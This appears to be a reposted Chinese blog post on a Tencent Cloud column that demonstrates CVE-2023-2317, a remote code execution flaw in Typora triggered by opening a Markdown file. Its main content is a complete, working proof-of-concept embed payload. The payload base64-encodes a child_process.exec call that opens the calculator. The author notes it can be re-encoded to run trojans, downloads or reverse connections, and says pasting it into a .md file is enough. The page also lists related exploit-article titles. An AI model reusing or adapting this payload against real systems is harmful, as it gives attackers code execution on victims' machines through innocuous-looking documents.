Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >常用md文件任意代码执行漏洞利用

常用md文件任意代码执行漏洞利用

作者头像
网e渗透安全部
发布于 2023-09-01 12:54:13
发布于 2023-09-01 12:54:13
39400
代码可运行
举报
文章被收录于专栏:白安全组白安全组
运行总次数:0
代码可运行

该漏洞最新情报,cve编号:

CVE-2023-2317

这个漏洞是Typora产生的

我们使用这个漏洞方式非常简单,这里仅演示打开电脑计算机

至于你想去执行木马,还是下载其他什么,或者是反向链接,懂得都懂

我这里简单演示一下

poc:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">

然后我们可以通过修改base64这段的内容执行不同的命令

我们粘贴到md中保存即可

其实这里一放进去就可以执行了,但是我们可以保存,然后再打开,这里给大家演示的

成功执行了命令,这里受影响版本应该是<1.6.7

目前影响的还是比较多的。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2023-08-28,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 白安全组 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
Fortinet Fortimail 7.0.1 跨站脚本
# 软件链接:https://fortimail.fortidemo.com/m/webmail/(厂商在线演示)
Khan安全团队
2022/03/03
4990
【网络安全】「漏洞复现」(二)使用 Typora 的程序员注意了!不要再复制粘贴了!
本篇博文是《从0到1学习安全测试》中漏洞复现系列的第二篇博文,主要内容是分析 Typora 出现 XSS 漏洞的原因,对该漏洞进行复现,并在多场景中进行实现,往期系列文章请访问博主的 安全测试 专栏;
sidiot
2023/09/07
9680
【网络安全】「漏洞复现」(二)使用 Typora 的程序员注意了!不要再复制粘贴了!
CRLF攻击原理介绍和使用
注意:本文分享给安全从业人员,网站开发人员和运维人员在日常工作中使用和防范恶意攻击,请勿恶意使用下面描述技术进行非法操作。
全栈工程师修炼指南
2020/10/23
7.6K0
CRLF攻击原理介绍和使用
CVE-2023-27121漏洞分析:Pleasant Password Manager的XSS漏洞导致凭证泄露
为此,研究人员对该组织所采用的密码管理解决方案(Pleasant Password Server)进行了详细分析,并成功从中发现了一个反射型跨站脚本漏洞,即CVE-2023-27121,而该漏洞将导致存储的密码发生泄漏。
FB客服
2023/10/06
3530
CVE-2023-27121漏洞分析:Pleasant Password Manager的XSS漏洞导致凭证泄露
漏洞利用:如何利用Office Word远程代码执行漏洞CVE-2021-40444
在本文中,我们将给大家提供一个针对微软Office Word远程代码执行漏洞CVE-2021-40444的PoC。这个PoC中,我们会使用一个恶意docx生成器,并成功利用CVE-2021-40444,即微软Office Word远程代码执行漏洞。
FB客服
2021/10/11
1.4K0
Electron 安全与你我息息相关
它的应用面如此之广,以至于我们很难忽略它的存在。这篇文章的目的在于介绍当前 Electron 安全发展态势,更关键的是,最近 XZ 后门事件直接导致了供应链安全的担忧,虽然很多应用程序并不一定开源,但是这篇文章会给大家介绍一些通用的切实可行的检测措施,找出 Electron 程序可能存在的 XSS To RCE 和有危害的供应链威胁
意大利的猫
2024/04/15
2.2K0
Electron 安全与你我息息相关
Weblogic漏洞利用总结
Weblogic是美国Oracle公司出品的一个应用服务器(application server),确切的说是一个基于Java EE架构的中间件,是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器
黑白天安全
2021/03/16
4.9K0
Weblogic漏洞利用总结
CISA在漏洞利用列表中增加了7个新漏洞
美国网络安全和基础设施安全局(CISA)在其积极漏洞利用的安全问题列表中新添加了7个漏洞,其中包括来自Microsoft、Linux和Jenkins的漏洞。所谓的已知被利用漏洞列表是在网络攻击中被积极利用并需要由联邦民事执行局(FCEB)机构修补的漏洞列表。
FB客服
2022/06/08
7060
CISA在漏洞利用列表中增加了7个新漏洞
Nebula漏洞利用包CVE-2016-0189漏洞利用分析
1. 引言 在最近的一年里, 漏洞利用工具包(EK/Exploit Kit)市场风云变幻。2016年六月初,曾经极为猖獗的Angler EK 销声匿迹,Neutrino EK 迅速填补了空白。随后短短不到3个月时间,Neutrino EK 又转为地下,RIG EK继而成为最流行的漏洞利用工具包。今年3月初,RIG又淡出视线,而迎来了新的Nebula EK。 Nebula EK包中对CVE-2016-0189的漏洞利用,比其它漏洞利用包的漏洞利用方有了一定改进,这里进行一下深入分析。 所用工具: IE11(调
FB客服
2018/02/24
1.6K0
Nebula漏洞利用包CVE-2016-0189漏洞利用分析
Lanproxy 任意文件读取漏洞 (CVE-2021-3019)漏洞利用
Lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面等等)本次Lanproxy 路径遍历漏洞 (CVE-2021-3019)通过../绕过读取任意文件。该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。
释然IT杂谈
2022/10/27
7490
Lanproxy 任意文件读取漏洞 (CVE-2021-3019)漏洞利用
CVE-2019-0708-Bluekeep漏洞利用告警
‍‍‍(‍9月7号0点左右)MSF更新了CVE-2019-0708漏洞利用模块,在MSF下使用,但根据官方显示‍,该模块仅针对64位的Win7系统和Server 2008 R2,但对于Server 2008 R2也有漏洞的特定的条件。
洛米唯熊
2019/09/09
7110
CVE-2019-0708-Bluekeep漏洞利用告警
Kibana 任意代码执行漏洞
这几天,有人公开了 Kibana 任意代码执行漏洞(CVE-2019-7609)的 POC。这个漏洞的主要原理是因为 Kibana 中的 Timelion 中具有原型链污染漏洞,因此可以导致指定变量的原型链污染,通过传递 NODE 环境变量参数,利用 Kibana 的 Canvas 会创建新进程的特性可以达到远程执行命令的效果。
madneal
2019/11/28
1.3K0
怎样利用CVE任意文件读取漏洞
怎么样通过hhhttttppp字符进行漏洞攻击(CVE-2023任意文件读取漏洞):
用户11372489
2024/11/20
480
IIS - 远程代码执行漏洞
开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行,目前针对Windows Server 2003 R2可以稳定利用,该漏洞最早在2016年7,8月份开始在野外被利用。
渗透攻击红队
2019/11/20
2.4K0
IIS - 远程代码执行漏洞
发现一款容器逃逸漏洞利用神器!
有在关注容器逃逸漏洞,最近在github上发现了一款零依赖Docker/K8s渗透工具包,集成了多个漏洞PoC/EXP,可轻松逃脱容器并接管K8s集群。
Bypass
2021/01/05
1.6K0
发现一款容器逃逸漏洞利用神器!
【安全漏洞】GitLab远程代码执行漏洞
GitLab是一个用于仓库管理系统的开源项目,其使用Git作为代码管理工具,可通过Web界面访问公开或私人项目。
运维朱工
2022/08/29
1.3K0
MyBB <= 1.8.31:SQL注入漏洞利用
MyBB是一种非常流行的开源论坛软件。然而,即使是一个流行的工具也可能包含可能导致整个系统崩溃的错误或错误链。在本文中,我们将介绍远程代码执行漏洞利用链。
信安百科
2023/10/02
6670
MyBB <= 1.8.31:SQL注入漏洞利用
Adobe Flash爆出严重漏洞:可导致代码任意执行 获取个人隐私
众所周知,Flash是网络攻击的首选目标。值得注意的是,Adobe在2017年7月宣布计划将Flash推入使用寿命终止状态,这意味着它将在今年年底不再更新或分发Flash Player。不过仍然在使用Adobe的用户需要警惕,因为Adobe 在今年5月被爆出了多个严重漏洞,好在Adobe于6月9日发布了安全更新,修复了漏洞。
行云博客
2020/08/11
1.2K0
漏洞情报|Drupal任意PHP代码执行漏洞风险通告
近日,腾讯云安全运营中心监测到,Drupal官方发布安全更新,披露了一个任意PHP代码执行漏洞,攻击者可利用该漏洞执行恶意代码,入侵服务器。 为避免您的业务受影响,腾讯云安全建议您及时开展安全自查,如在受影响范围,请您及时进行更新修复,避免被外部攻击者入侵。 漏洞详情 Drupal项目使用PEAR Archive_Tar库。PEAR Archive_Tar库已经发布了影响Drupal的安全更新(漏洞编号:CVE-2020-28949/CVE-2020-28948)。如果将Drupal配置为允许.tar,.
云鼎实验室
2020/11/26
6310
任意文件下载/读取漏洞利用
字面意思理解,就是你能够读取任何 你有权限读取到的文件,但有一个最主要的问题就是,你不知道 文件名
Elapse
2020/08/17
4.8K0
推荐阅读
相关推荐
Fortinet Fortimail 7.0.1 跨站脚本
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验